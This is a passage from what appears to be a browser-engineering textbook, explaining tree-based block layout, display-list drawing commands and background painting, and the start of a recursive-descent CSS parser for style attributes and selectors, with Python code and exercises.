So far, we’ve focused on text layout—and text is laid out horizontally in lines.In European languages, at least! But web pages are really constructed out of larger blocks, like headings, paragraphs, and menus, that are stacked vertically one after another. We need to add support for this kind of layout to our browser, and the way we’re going to do that involves expanding on the layout tree we’ve already built.
The core idea is that we’ll have a whole tree of
BlockLayout
objects (with a DocumentLayout
at
the root). Some will represent leaf blocks that contain text, and
they’ll lay out their contents the way we’ve already implemented. But
there will also be new, intermediate BlockLayout
s with
BlockLayout
children, and they will stack their children
vertically.
To create these intermediate BlockLayout
children, we
can use a loop like this:
class BlockLayout:
    def layout_intermediate(self):
        previous = None
        for child in self.node.children:
            next = BlockLayout(child, self, previous)
            self.children.append(next)
            previous = next
I’ve called this method layout_intermediate
, but only so
you can add it to the code right away and then compare it with the
existing recurse
method.
This code is tricky, so read it carefully. It involves two trees: the
HTML tree, which node
and child
point to; and
the layout tree, which self
, previous
, and
next
point to. The two trees have similar structure, so
it’s easy to get confused. But remember that this code constructs the
layout tree from the HTML tree, so it reads from
node.children
(in the HTML tree) and writes to
self.children
(in the layout tree).
So we have two ways to lay out an element: either calling
recurse
and flush
, or this
layout_intermediate
function. To determine which one a
layout object should use, we’ll need to know what kind of content its
HTML node contains: text and text-related tags like
<b>
, or blocks like <p>
and
<h1>
. That function looks something like this:
class BlockLayout:
    def layout_mode(self):
        if isinstance(self.node, Text):
            return "inline"
        elif self.node.children:
            if any([isinstance(child, Element) and \
                    child.tag in BLOCK_ELEMENTS
                    for child in self.node.children]):
                return "block"
            else:
                return "inline"
        else:
            return "block"
Here the list of BLOCK_ELEMENTS
is basically what you
expect, a list of all the tags that describe parts of a page instead of
formatting:Taken from
the HTML
living standard.
BLOCK_ELEMENTS = [
    "html", "body", "article", "section", "nav", "aside",
    "h1", "h2", "h3", "h4", "h5", "h6", "hgroup", "header",
    "footer", "address", "p", "hr", "pre", "blockquote",
    "ol", "ul", "menu", "li", "dl", "dt", "dd", "figure",
    "figcaption", "main", "div", "table", "form", "fieldset",
    "legend", "details", "summary",
]
Our layout_mode
method has to handle one tricky case,
where a node contains both block children like a <p>
element but also text children like a text node or a
<b>
element. I’ve chosen to use block mode in this
case, but it’s probably best to think of this as a kind of error on the
part of the web developer. And just like with implicit tags in Chapter 4, we use a repair mechanism to make sense
of the situation.In real
browsers, that repair mechanism is called “anonymous
block boxes” and is more complex than what’s described
here.
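The decision procedure can be exercised on its own with stand-in node classes and an abbreviated block list. This is a sketch for testing; the real method reads self.node and the full BLOCK_ELEMENTS list:

```python
BLOCK_ELEMENTS = ["html", "body", "p", "h1", "div"]  # abbreviated list

# Simplified stand-ins for the parser's node classes.
class Text:
    def __init__(self, text):
        self.text = text

class Element:
    def __init__(self, tag, children):
        self.tag, self.children = tag, children

def layout_mode(node):
    # Same decision procedure as the method, on an explicit node.
    if isinstance(node, Text):
        return "inline"
    elif node.children:
        if any([isinstance(child, Element) and \
                child.tag in BLOCK_ELEMENTS
                for child in node.children]):
            return "block"
        else:
            return "inline"
    else:
        return "block"

para = Element("p", [Text("hi"), Element("b", [Text("there")])])
body = Element("body", [para])
# layout_mode(para) == "inline"; layout_mode(body) == "block"
```

A paragraph mixing text and <b> is "inline", while a <body> containing a <p> is "block": one block child is enough to tip the whole element into block mode, the repair behavior described above.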
So now BlockLayout
can determine what kind of layout to
do based on the layout_mode
of its HTML node:
class BlockLayout:
    def layout(self):
        mode = self.layout_mode()
        if mode == "block":
            previous = None
            for child in self.node.children:
                next = BlockLayout(child, self, previous)
                self.children.append(next)
                previous = next
        else:
            self.cursor_x = 0
            self.cursor_y = 0
            self.weight = "normal"
            self.style = "roman"
            self.size = 16
            self.line = []
            self.recurse(self.node)
            self.flush()
Finally, since BlockLayout
s can now have children, the
layout
method next needs to recursively call
layout
so those children can construct their children, and
so on recursively:
class BlockLayout:
def layout(self):
# ...
for child in self.children:
child.layout()
We also need to gather their display_list
fields into a
single array:
class BlockLayout:
def layout(self):
# ...
for child in self.children:
self.display_list.extend(child.display_list)
Our browser is now constructing a whole tree of
BlockLayout
objects; in fact, if you add a
print_tree
call to Browser
’s load
method, you’ll see that large web pages like this chapter produce large
and complex layout trees!
Oh, you might also notice that the text on these web pages is now totally unreadable, because it’s all overlapping at the top of the page. Let’s fix that next.
In CSS, the layout mode is set by the display
property. The oldest CSS layout modes, like inline
and
block
, are set on the children instead of the parent, which
leads to hiccups like anonymous
block boxes. Newer properties like inline-block
,
flex
, and grid
are set on the parent. This
chapter uses the newer, less confusing convention, even though it’s
actually implementing inline and block layout.
In the previous chapter, the
Layout
object was responsible for the whole web page, so it
just laid out its content starting at the top of the page. Now that we
have multiple BlockLayout
objects each containing a
different paragraph of text, we’re going to need to do things a little
differently, computing a size and position for each layout object
independently.
Let’s start with cursor_x
and cursor_y
.
Instead of having them denote absolute positions on the page, let’s make
them relative to the BlockLayout
itself; they now need to
start from 0
instead of HSTEP
and
VSTEP
, both in layout
and
flush
:
class BlockLayout:
    def layout(self):
        # ...
        else:
            self.cursor_x = 0
            self.cursor_y = 0
            # ...

    def flush(self):
        # ...
        self.cursor_x = 0
        # ...
Since these fields are now relative, we’ll need to add the block’s
x
and y
position in flush
when
computing the display list:
class BlockLayout:
    def flush(self):
        # ...
        for rel_x, word, font in self.line:
            x = self.x + rel_x
            y = self.y + baseline - font.metrics("ascent")
            self.display_list.append((x, y, word, font))
        # ...
Similarly, to wrap lines, we can’t compare cursor_x
to
WIDTH
, because cursor_x
is a relative measure
while WIDTH
is an absolute measure; instead, we’ll wrap
lines when cursor_x
reaches the block’s
width
:
class BlockLayout:
def word(self, word):
# ...
if self.cursor_x + w > self.width:
# ...
# ...
So now that leaves us with the problem of computing these
x
, y
, and width
fields. Let’s
recall that BlockLayout
s represent blocks of text like
paragraphs or headings, and are stacked vertically one atop another.
That means each one starts at its parent’s left edge:
class BlockLayout:
def layout(self):
self.x = self.parent.x
# ...
Its vertical position depends on the position and height of its previous sibling. If there is no previous sibling, it starts at the parent’s top edge:
class BlockLayout:
def layout(self):
if self.previous:
self.y = self.previous.y + self.previous.height
else:
self.y = self.parent.y
# ...
Note that in each of these cases, to compute one block’s
x
and y
, the x
and y
of its parent block must already have been computed. That means
these computations have to go before the recursive
layout
call, so those children can compute their
x
and y
based on this block’s x
and y
. Similarly, since the y
position of a
block depends on its previous sibling’s y
position, the
recursive layout
calls have to start at the first sibling
and iterate through the list forward—which is how we’ve already done it,
but which will be an important constraint in later chapters.
Now we’ll need to compute widths and heights. Width is easy: blocks are as wide as their parents:In the next chapter, we’ll add support for author-defined styles, which in real browsers modify these layout rules by setting custom widths or changing how x and y position are computed.
class BlockLayout:
def layout(self):
self.width = self.parent.width
# ...
Height, meanwhile, is a little tricky. A BlockLayout
that contains other blocks should be tall enough to contain all of its
children, so its height should be the sum of its children’s heights:
class BlockLayout:
    def layout(self):
        # ...
        if mode == "block":
            self.height = sum([
                child.height for child in self.children])
However, a BlockLayout
that contains text doesn’t have
children; instead, it needs to be tall enough to contain all its text,
which we can conveniently read off of cursor_y
:Since the height is just equal
to cursor_y
, why not rename cursor_y
to
height
instead? You could, it would work fine, but I would
rather not. As you can see from, say, the y
computation,
the height
field is a public field, read by other layout
objects to compute their positions. As such I’d rather make sure it
always has the right value, whereas cursor_y
changes as we lay out a paragraph of text and therefore sometimes has
the “wrong” value. Keeping these two fields separate avoids a whole
class of nasty bugs where the height
field is read “too
soon” and therefore gets the wrong value.
class BlockLayout:
def layout(self):
# ...
else:
self.height = self.cursor_y
Let’s think again about dependencies. Height has the opposite
dependencies compared to x
, y
, and
width
: the height
of a block depends on its
children’s heights. While x
, y
, and
width
must be computed before the recursive call,
height
has to be computed after, at the very end
of layout
.
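This dependency order can be sketched with a stripped-down layout object that computes only sizes and positions, assuming a fixed content height for leaf blocks. All of the names here are hypothetical stand-ins for testing, not the browser’s actual classes:

```python
class ToyDocument:
    # Stand-in root: fixed size and position, like DocumentLayout.
    def __init__(self):
        self.width, self.x, self.y = 100, 0, 0

class ToyBlock:
    # Stripped-down layout object: no text, just the size-and-position
    # protocol. children_spec is a nested list describing the subtree.
    def __init__(self, parent, previous, children_spec):
        self.parent, self.previous = parent, previous
        self.children_spec = children_spec
        self.children = []

    def layout(self):
        # Step 1: width, x, and y read from the parent and previous
        # sibling, so they are computed before recursing.
        self.width = self.parent.width
        self.x = self.parent.x
        if self.previous:
            self.y = self.previous.y + self.previous.height
        else:
            self.y = self.parent.y
        # Step 2: create children and lay them out, first to last.
        previous = None
        for spec in self.children_spec:
            child = ToyBlock(self, previous, spec)
            self.children.append(child)
            child.layout()
            previous = child
        # Step 3: height reads from the children, so it comes last.
        if self.children:
            self.height = sum([c.height for c in self.children])
        else:
            self.height = 20  # assumed fixed height for a leaf block

block = ToyBlock(ToyDocument(), None, [[], []])
block.layout()
# The two leaves stack: the second starts at y=20, and the
# parent block's height is 40.
```

Try reordering the steps: computing height before the recursion, for example, raises an AttributeError because the children’s heights don’t exist yet, which is exactly the class of bug the ordering discipline prevents.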
Finally, even DocumentLayout
needs some layout code,
though since the document always starts in the same place it’s pretty
simple:
class DocumentLayout:
    def layout(self):
        # ...
        self.width = WIDTH - 2*HSTEP
        self.x = HSTEP
        self.y = VSTEP
        child.layout()
        self.height = child.height + 2*VSTEP
Note that there’s some padding around the contents—HSTEP
on the left and right, and VSTEP
above and below. That’s so
the text won’t run into the very edge of the window and get cut off.
For all three types of layout object, the order of the steps in the layout method should be the same:
1. When layout is called, it first computes the width, x, and y fields, reading from the parent and previous layout objects.
2. Next, it creates its child layout objects and recursively calls their layout methods.
3. Finally, layout computes the height field, reading from the child layout objects.
This kind of dependency reasoning is crucial to layout and more broadly to any kind of computation on trees. If you get the order of operations wrong, some layout object will try to read a value that hasn’t been computed yet, and the browser will have a bug. We’ll come back to this issue of dependencies later, where it will become even more important.
Anyway, with all of the sizes and positions now computed correctly, you should see the browser now correctly display all of the text on the page.
Formally, computations on a tree like this can be described by an attribute grammar. Attribute grammar engines analyze dependencies between different attributes to determine the right order to traverse the tree and calculate each attribute.
Our layout
method is now doing quite a bit of work:
computing sizes and positions; creating child layout objects;
recursively laying out those child layout objects; and aggregating the
display lists so the text can be drawn to the screen. This is a bit
messy, so let’s take a moment to extract just one part of this, the
display list part. Along the way, we can stop copying the display list
contents over and over again as we go up the layout tree.
I think it’s most convenient to do that by adding a
paint
function to each layout object, which appends any of
its own layout objects to the display list and then recursively paints
the child layouts. A neat trick here is to pass the list itself as an
argument, and have the recursive function append to that list. For
DocumentLayout
, which only has one child, the recursion
looks like this:
class DocumentLayout:
def paint(self, display_list):
self.children[0].paint(display_list)
You can now delete the line that computes a
DocumentLayout
’s display_list
field.
For a BlockLayout
with multiple children,
paint
is called on each child:
class BlockLayout:
def paint(self, display_list):
for child in self.children:
child.paint(display_list)
Again, delete the line that computes a BlockLayout
’s
display_list
field by copying from child layout
objects.
Finally for a BlockLayout
object with text inside, we
need to copy over the display_list
field that it computes
during recurse
and flush
:
class BlockLayout:
    def paint(self, display_list):
        display_list.extend(self.display_list)
Now the browser can use paint
to collect its own
display_list
variable:
class Browser:
def load(self, url):
# ...
self.display_list = []
self.document.paint(self.display_list)
self.draw()
Check it out: your browser is now using fancy tree-based layout! I recommend pausing to test and debug. Tree-based layout is powerful but complex, and we’re about to add more features. Stable foundations make for comfortable houses.
Layout trees are common in GUI frameworks, but there are other ways to structure layout, such as constraint-based layout. TeX’s boxes and glue and iOS auto-layout are two examples of this alternative paradigm.
Browsers use the layout tree a lot,For example, in Chapter 7, we’ll use the size and position of each link to figure out which one the user clicked on. and one simple and visually compelling use case is drawing backgrounds.
Backgrounds are rectangles, so our first task is putting rectangles in the display list. Conceptually, the display list contains commands, and we want two types of commands:
class DrawText:
def __init__(self, x1, y1, text, font):
self.top = y1
self.left = x1
self.text = text
self.font = font
class DrawRect:
def __init__(self, x1, y1, x2, y2, color):
self.top = y1
self.left = x1
self.bottom = y2
self.right = x2
self.color = color
Now BlockLayout
must add DrawText
objects
to the display list:Why
not change the display_list
field inside an
BlockLayout
to contain DrawText
commands
directly? I suppose you could, but I think it’s cleaner this way, with
all of the draw commands created in one place.
class BlockLayout:
    def paint(self, display_list):
        for x, y, word, font in self.display_list:
            display_list.append(DrawText(x, y, word, font))
        # ...
Note that we must add the block’s x
and y
,
since the positions in the display list are relative to the block’s
position.
But it can also add DrawRect
commands for backgrounds.
Let’s add a gray background to pre
tags (which are used for
code examples):
class BlockLayout:
    def paint(self, display_list):
        if isinstance(self.node, Element) and self.node.tag == "pre":
            x2, y2 = self.x + self.width, self.y + self.height
            rect = DrawRect(self.x, self.y, x2, y2, "gray")
            display_list.append(rect)
        # ...
Make sure this code comes before the loop that adds
DrawText
objects and before the recursion into
child layout objects: the background has to be drawn below and
therefore before any contents. This is again a kind of
dependency reasoning with tree traversals!
With the display list filled out, we need the paint
method to run each graphics command. Let’s add an execute
method for this. On DrawText
it calls
create_text
:
class DrawText:
    def execute(self, scroll, canvas):
        canvas.create_text(self.left, self.top - scroll,
            text=self.text,
            font=self.font,
            anchor='nw',
        )
Note that execute
takes the scroll amount as a
parameter; this way, each graphics command does the relevant coordinate
conversion itself. DrawRect
does the same with
create_rectangle
:
class DrawRect:
    def execute(self, scroll, canvas):
        canvas.create_rectangle(self.left, self.top - scroll,
            self.right, self.bottom - scroll,
            width=0,
            fill=self.color,
        )
By default, create_rectangle draws a one-pixel black border, which we don’t want for backgrounds, so make sure to pass width=0.
We still want to skip offscreen graphics commands, so let’s add a
bottom
field to DrawText
so we know when to
skip those:
def __init__(self, x1, y1, text, font):
# ...
self.bottom = y1 + font.metrics("linespace")
The browser’s draw
method now just uses top
and bottom
to decide which commands to
execute
:
class Browser:
    def draw(self):
        self.canvas.delete("all")
        for cmd in self.display_list:
            if cmd.top > self.scroll + HEIGHT: continue
            if cmd.bottom < self.scroll: continue
            cmd.execute(self.scroll, self.canvas)
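The culling test can be checked in isolation with stand-in command objects that carry only a vertical extent. This is a sketch for testing; the real draw method calls each command’s execute method rather than collecting them:

```python
class Cmd:
    # Stand-in for a display-list command: just the vertical extent.
    def __init__(self, top, bottom):
        self.top, self.bottom = top, bottom

def visible(cmds, scroll, height):
    # Same culling test as draw(): skip commands entirely above
    # or entirely below the current viewport.
    shown = []
    for cmd in cmds:
        if cmd.top > scroll + height: continue
        if cmd.bottom < scroll: continue
        shown.append(cmd)
    return shown

cmds = [Cmd(0, 20), Cmd(580, 620), Cmd(1000, 1020)]
# With scroll=0 and a 600-pixel-tall window, the first two commands
# are drawn; the third starts below the viewport and is skipped.
```

Note that a command straddling the viewport edge, like the one spanning 580 to 620, is still drawn: only commands wholly offscreen are skipped.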
Try your browser on a page—maybe this one—with code snippets on it. You should see each code snippet set off with a gray background.
On some systems, the measure
and metrics
commands are awfully slow. Adding another call makes things even
slower.
Luckily, this metrics
call duplicates a call in
flush
. If you’re careful you can pass the results of that
call to DrawText
as an argument.
Here’s one more cute benefit of tree-based layout. Thanks to tree-based layout we now record the height of the whole page. The browser can use that to avoid scrolling past the bottom of the page:
    def scrolldown(self, e):
        max_y = max(self.document.height - HEIGHT, 0)
        self.scroll = min(self.scroll + SCROLL_STEP, max_y)
        self.draw()
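The clamping arithmetic can be checked in isolation; clamp_scroll below is a hypothetical standalone helper, not a browser method:

```python
SCROLL_STEP, HEIGHT = 100, 600

def clamp_scroll(scroll, doc_height):
    # never scroll past the last screenful of content
    max_y = max(doc_height - HEIGHT, 0)
    return min(scroll + SCROLL_STEP, max_y)

assert clamp_scroll(0, 1000) == 100    # normal scroll step
assert clamp_scroll(380, 1000) == 400  # clamped at the bottom
assert clamp_scroll(0, 500) == 0       # short page never scrolls
```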
So those are the basics of tree-based layout! In fact, as we’ll see in the next two chapters, this is just part of the layout tree’s role in the browser. But before we get to that, we need to add some styling capabilities to our browser.
The draft CSS Painting API allows pages to extend the display list with new types of commands, implemented in JavaScript. This makes it possible to use CSS for styling with visually-complex styling provided by a library.
This chapter was a dramatic rewrite of your browser’s layout engine.
Tree-based layout makes it possible to dramatically expand our browser’s styling capabilities. We’ll work on that in the next chapter.
The complete set of functions, classes, and methods in our browser should look something like this:
class URL:
def __init__(url)
def request()
WIDTH
HEIGHT
HSTEP
VSTEP
SCROLL_STEP
FONTS
def get_font(size, weight, slant)
class Text:
def __init__(text, parent)
def __repr__()
class Element:
def __init__(tag, attributes, parent)
def __repr__()
def print_tree(node, indent)
class HTMLParser:
def __init__(body)
def parse()
def get_attributes(text)
def add_text(text)
SELF_CLOSING_TAGS
def add_tag(tag)
HEAD_TAGS
def implicit_tags(tag)
def finish()
class BlockLayout:
def __init__(node, parent, previous)
def token(tok)
def word(word)
def flush()
def recurse(tree)
def open_tag(tag)
def close_tag(tag)
def layout()
def layout_mode()
def paint(display_list)
class Browser:
def __init__()
def load(url)
def draw()
def scrolldown(e)
BLOCK_ELEMENTS
class DocumentLayout:
def __init__(node)
def layout()
def paint(display_list)
def __repr__()
class DrawText:
def __init__(x1, y1, text, font)
def execute(scroll, canvas)
def __repr__()
class DrawRect:
def __init__(x1, y1, x2, y2, color)
def execute(scroll, canvas)
def __repr__()
if __name__ == "__main__"
Links Bar: At the top and bottom of each chapter of this
book is a gray bar naming the chapter and offering back and forward
links. It is enclosed in a <nav class="links">
tag.
Have your browser give this links bar the light gray background a real
browser would.
Hidden Head: There’s a good chance your browser is still
showing scripts, styles, and page titles at the top of every page you
visit. Make it so that the <head>
element and its
contents are never displayed. Those elements should still be in the HTML
tree, but not in the layout tree.
Bullets: Add bullets to list items, which in HTML are
<li>
tags. You can make them little squares, located
to the left of the list item itself. Also indent <li>
elements so the text inside the element is to the right of the bullet
point.
Scrollbar: At the right edge of the screen, draw a blue, rectangular scrollbar. The ratio of its height to the screen height should be the same as the ratio of the screen height to the document height, and its location should reflect the position of the screen within the document. Hide the scrollbar if the whole document fits onscreen.
Table of Contents: This book has a table of contents at the
top of each chapter, enclosed in a <nav id="toc">
tag, which contains a list of links. Add the text “Table of Contents”,
with a gray background, above that list. Don’t modify the lexer or
parser.
Anonymous block boxes: Sometimes, an element has a mix of text-like and container-like children. For example, in this HTML,
<div><i>Hello, </i><b>world!</b><p>So it began...</p></div>
the <div>
element has three children: the
<i>
, <b>
, and
<p>
elements. The first two are text-like; the last
is container-like. This is supposed to look like two paragraphs, one for
the <i>
and <b>
and the second for
the <p>
. Make your browser do that. Specifically,
modify BlockLayout
so it can be passed a sequence of
sibling nodes, instead of a single node. Then, modify the algorithm that
constructs the layout tree so that any sequence of text-like elements
gets made into a single BlockLayout
.
Run-ins: A “run-in heading” is a heading that is drawn as
part of the next paragraph’s text. (The exercise names in this section
could be considered run-in headings. But since browser support for the
display: run-in
property is poor, this book actually
doesn’t use it; the headings are actually embedded in the next
paragraph.) Modify your browser to render
<h6>
elements as run-in headings. You’ll need to
implement the previous exercise on anonymous block boxes, and then add a
special case for <h6>
elements.
In the last chapter, we gave each
pre
element a gray background. It looks OK, and it
is good to have defaults… but of course sites want a say in how
they look. Websites do that with Cascading Style Sheets, which
allow web authors (and, as we’ll see, browser developers) to define how
a web page ought to look.
One way a web page can change its appearance is with the
style
attribute. For example, this changes an element’s
background color:
<div style="background-color:lightblue"></div>
More generally, a style
attribute contains
property/value pairs separated by semicolons. The browser looks at those
property-value pairs to determine how an element looks, for example to
determine its background color.
To add this to our browser, we’ll need to start by parsing these
property/value pairs. I’ll use recursive parsing functions,
which are a good way to build a complex parser step by step. The idea is
that each parsing function advances through the text being parsed and
returns the data it parsed. We’ll have different functions for different
types of data, and organize them in a CSSParser
class that
stores the text being parsed and the parser’s current position in
it:
class CSSParser:
    def __init__(self, s):
        self.s = s
        self.i = 0
Let’s start small and build up. A parsing function for whitespace
increments the index i
past every whitespace character:
    def whitespace(self):
        while self.i < len(self.s) and self.s[self.i].isspace():
            self.i += 1
Whitespace is insignificant, so there’s no data to return in this case. On the other hand, we’ll want to return property names and values when we parse them:
    def word(self):
        start = self.i
        while self.i < len(self.s):
            if self.s[self.i].isalnum() or self.s[self.i] in "#-.%":
                self.i += 1
            else:
                break
        if not (self.i > start):
            raise Exception("Parsing error")
        return self.s[start:self.i]
This function increments i
through any word characters, much like whitespace
. But to return the parsed data, it stores where it started and extracts
the substring it moved through. (I’ve chosen the set of word characters
here to cover property names, which use letters and the dash; numbers,
which use the minus sign, digits, and periods; units, which use the
percent sign; and colors, which use the hash sign. Real CSS values have
a more complex syntax, but this is enough for our toy browser.)
Parsing functions can fail. The word
function we just
wrote raises an exception if i
hasn’t advanced through at
least one character—otherwise it didn’t point at a word to begin
with. (You can add error text to the exception-raising code, too; I
recommend doing that to help you debug problems.) Likewise, to check
for a literal colon (or some other punctuation character) you’d do this:
    def literal(self, literal):
        if not (self.i < len(self.s) and self.s[self.i] == literal):
            raise Exception("Parsing error")
        self.i += 1
The great thing about parsing functions is that they can build on one
another. (In reality properties and values have different syntaxes, so
using word
for both isn’t quite right, but for our browser’s
limited CSS this simplification will do.) For example, property-value
pairs are a property, a colon, and a value, with whitespace in between:
    def pair(self):
        prop = self.word()
        self.whitespace()
        self.literal(":")
        self.whitespace()
        val = self.word()
        return prop.lower(), val
We can parse sequences by calling parsing functions in a loop. For
example, style
attributes are a sequence of property-value
pairs:
    def body(self):
        pairs = {}
        while self.i < len(self.s):
            prop, val = self.pair()
            pairs[prop.lower()] = val
            self.whitespace()
            self.literal(";")
            self.whitespace()
        return pairs
Now, in a browser, we always have to think about handling errors. Sometimes a web page author makes a mistake; sometimes our browser doesn’t support a feature some other browser does. So we should skip property-value pairs that don’t parse, but keep the ones that do.
We can skip things with this little function; it stops at any one of
a set of characters, and returns that character (or None
if
it was stopped by the end of the file):
    def ignore_until(self, chars):
        while self.i < len(self.s):
            if self.s[self.i] in chars:
                return self.s[self.i]
            else:
                self.i += 1
When we fail to parse a property-value pair, we either skip to the next semicolon or to the end of the string:
    def body(self):
        # ...
        while self.i < len(self.s):
            try:
                # ...
            except Exception:
                why = self.ignore_until([";"])
                if why == ";":
                    self.literal(";")
                    self.whitespace()
                else:
                    break
        # ...
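Putting the pieces together, here is the parser so far as one self-contained sketch, run on a style attribute with a malformed pair in the middle. The bad pair is skipped; the valid ones survive:

```python
class CSSParser:
    def __init__(self, s):
        self.s = s
        self.i = 0

    def whitespace(self):
        while self.i < len(self.s) and self.s[self.i].isspace():
            self.i += 1

    def word(self):
        start = self.i
        while self.i < len(self.s):
            if self.s[self.i].isalnum() or self.s[self.i] in "#-.%":
                self.i += 1
            else:
                break
        if not (self.i > start):
            raise Exception("Parsing error")
        return self.s[start:self.i]

    def literal(self, literal):
        if not (self.i < len(self.s) and self.s[self.i] == literal):
            raise Exception("Parsing error")
        self.i += 1

    def pair(self):
        prop = self.word()
        self.whitespace()
        self.literal(":")
        self.whitespace()
        val = self.word()
        return prop.lower(), val

    def ignore_until(self, chars):
        while self.i < len(self.s):
            if self.s[self.i] in chars:
                return self.s[self.i]
            self.i += 1

    def body(self):
        pairs = {}
        while self.i < len(self.s):
            try:
                prop, val = self.pair()
                pairs[prop] = val
                self.whitespace()
                self.literal(";")
                self.whitespace()
            except Exception:
                # skip to the next semicolon, or give up at the end
                why = self.ignore_until([";"])
                if why == ";":
                    self.literal(";")
                    self.whitespace()
                else:
                    break
        return pairs

pairs = CSSParser("background-color:lightblue; !!bad!!; color:red").body()
assert pairs == {"background-color": "lightblue", "color": "red"}
```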
Skipping parse errors is a double-edged sword. It hides error
messages, making it harder for authors to debug their style sheets; it
also makes it harder to debug your parser. (I suggest removing the
try
block when debugging.) So in most programming
situations this “catch-all” error handling is a code smell.
But “catch-all” error handling has an unusual benefit on the web. The
web is an ecosystem of many browsers (and of many browser versions, some
of which haven’t been written yet—but need to be supported as best we
can), which (for example) support different kinds of property values.
(Our browser does not support parentheses in property values, for
example, which real browsers use for things like the calc
and url
functions.) CSS that parses in one browser
might not parse in another. With silent parse errors, browsers just
ignore stuff they don’t understand, and web pages mostly work in all of
them. The principle (variously called “Postel’s Law”, after a line in
the specification of TCP written by Jon Postel; the “Digital Principle”,
after a similar idea in circuit design where transistors must be
nonlinear to reduce analog noise; or the “Robustness Principle”) is:
produce maximally conformant output but accept even minimally conformant
input.
This parsing method is formally called recursive descent parsing for an LL(1) language. Parsers that use this method can be really, really fast, at least if you put a lot of work into it. In a browser, faster parsing means pages load faster.
Now that the style
attribute is parsed, we can use that
parsed information in the rest of the browser. We’ll store the parsed
information in a style
field on each node:
def style(node):
    node.style = {}
    # ...
    for child in node.children:
        style(child)
Call style
in the browser’s load
method,
after parsing the HTML but before doing layout.
This style
function will also fill in the
style
field by parsing the element’s style
attribute:
def style(node):
    # ...
    if isinstance(node, Element) and "style" in node.attributes:
        pairs = CSSParser(node.attributes["style"]).body()
        for property, value in pairs.items():
            node.style[property] = value
    # ...
With the style
information stored on each element, the
browser can consult it for styling information:
class BlockLayout:
    def paint(self, display_list):
        bgcolor = self.node.style.get("background-color",
            "transparent")
        if bgcolor != "transparent":
            x2, y2 = self.x + self.width, self.y + self.height
            rect = DrawRect(self.x, self.y, x2, y2, bgcolor)
            display_list.append(rect)
        # ...
I’ve removed the default gray background from pre
elements for now, but we’ll put it back soon.
Open this chapter up in your browser to test your code: the code block right after this paragraph should now have a light blue background.
<div style="background-color:lightblue"> ... </div>
So this is one way web pages can change their appearance. And in the
early days of the web (I’m talking Netscape 3; the late 90s), something
like this was the only way. But honestly, it’s a pain—you need to set a
style
attribute on each element, and if you change the
style that’s a lot of attributes to edit. CSS was invented to improve on
this state of affairs. To do that, CSS extends the style
attribute with two related ideas: selectors and cascading.
Selectors describe which HTML elements a list of property/value pairs
apply to. (CSS rules can also be guarded by “media queries”, which say
that a rule should apply only in certain browsing environments, like
only on mobile or only in landscape mode. Media queries are
super-important for building sites that work across many devices, like
reading this book on a phone.) A rule looks like this:

selector { property-1: value-1; property-2: value-2; }
Since one of these rules can apply to many elements, it’s possible for several rules to apply to the same element. So browsers have a cascading mechanism to resolve conflicts in favor of the most specific rule. Cascading also means a browser can ignore rules it doesn’t understand and choose the next-most-specific rule that it does understand.
So next, let’s add support for CSS to our browser. We’ll need to
parse CSS files into selectors and property/value pairs; figure out
which elements on the page match each selector; and then copy those
property values to the elements’ style
fields.
Actually, before CSS, you’d style pages with custom elements like font
and center
.
This was easy to implement but made it hard to keep pages consistent.
There were also properties on <body>
like text
and vlink
that could consistently set text colors,
mainly for links.
Selectors come in lots of types, but in our browser, we’ll support
two: tag selectors (p
selects all <p>
elements, ul
selects all <ul>
elements)
and descendant selectors (article div
selects all
div
elements with an article
ancestor).
(The descendant selector associates to the left; in other words,
a b c
means a c
that descends from a
b
that descends from an a
, which maybe you’d
write (a b) c
if CSS had parentheses.)
We’ll have a class for each type of selector to store the selector’s contents, like the tag name for a tag selector:
class TagSelector:
    def __init__(self, tag):
        self.tag = tag
Each selector class will also test whether the selector matches an element:
    def matches(self, node):
        return isinstance(node, Element) and self.tag == node.tag
A descendant selector works similarly. It has two parts, which are both themselves selectors:
class DescendantSelector:
    def __init__(self, ancestor, descendant):
        self.ancestor = ancestor
        self.descendant = descendant
Then the matches
method is recursive (and bottoms out at,
say, a TagSelector
):
class DescendantSelector:
    def matches(self, node):
        if not self.descendant.matches(node): return False
        while node.parent:
            if self.ancestor.matches(node.parent): return True
            node = node.parent
        return False
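As a quick self-contained check of both selector types (with a minimal stand-in for the browser’s Element class):

```python
class Element:
    def __init__(self, tag, parent=None):
        self.tag = tag
        self.parent = parent

class TagSelector:
    def __init__(self, tag):
        self.tag = tag
    def matches(self, node):
        return isinstance(node, Element) and self.tag == node.tag

class DescendantSelector:
    def __init__(self, ancestor, descendant):
        self.ancestor = ancestor
        self.descendant = descendant
    def matches(self, node):
        if not self.descendant.matches(node): return False
        while node.parent:
            if self.ancestor.matches(node.parent): return True
            node = node.parent
        return False

# a tiny tree: <html><article><div>...</div></article></html>
html = Element("html")
article = Element("article", html)
div = Element("div", article)

sel = DescendantSelector(TagSelector("article"), TagSelector("div"))
assert sel.matches(div)          # div has an article ancestor
assert not sel.matches(article)  # article itself is not a div
```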
Now, to create these selector objects, we need a parser. In this
case, that’s just another parsing function. (Once again, using
word
here for tag names is actually not quite right, but
it’s close enough. One tricky side effect of using word
is
that a class name selector (like .main
) or an identifier
selector (like #signup
) is mis-parsed as a tag name
selector. But that won’t cause any harm since there aren’t any elements
with those tags.)
    def selector(self):
        out = TagSelector(self.word().lower())
        self.whitespace()
        while self.i < len(self.s) and self.s[self.i] != "{":
            tag = self.word()
            descendant = TagSelector(tag.lower())
            out = DescendantSelector(out, descendant)
            self.whitespace()
        return out
A CSS file is just a sequence of selectors and blocks:
    def parse(self):
        rules = []
        while self.i < len(self.s):
            self.whitespace()
            selector = self.selector()
            self.literal("{")
            self.whitespace()
            body = self.body()
            self.literal("}")
            rules.append((selector, body))
        return rules
Once again, let’s pause to think about error handling. First, when we
call body
while parsing CSS, we need it to stop when it
reaches a closing brace:
    def body(self):
        # ...
        while self.i < len(self.s) and self.s[self.i] != "}":
            try:
                # ...
            except Exception:
                why = self.ignore_until([";", "}"])
                if why == ";":
                    self.literal(";")
                    self.whitespace()
                else:
                    break
        # ...
Second, there might also be a parse error while parsing a selector. In that case, we want to skip the whole rule:
    def parse(self):
        # ...
        while self.i < len(self.s):
            try:
                # ...
            except Exception:
                why = self.ignore_until(["}"])
                if why == "}":
                    self.literal("}")
                    self.whitespace()
                else:
                    break
        # ...
Error handling is hard to get right, so make sure to test your parser, just like the HTML parser two chapters back. Here are some errors you might run into:
If the output is missing some rules or properties, it’s probably
a bug being hidden by error handling. Remove some try
blocks and see if the error in question can be fixed.
If you’re seeing extra rules or properties that are mangled
versions of the correct ones, you probably forgot to update
i
somewhere.
If you’re seeing an infinite loop, check whether the
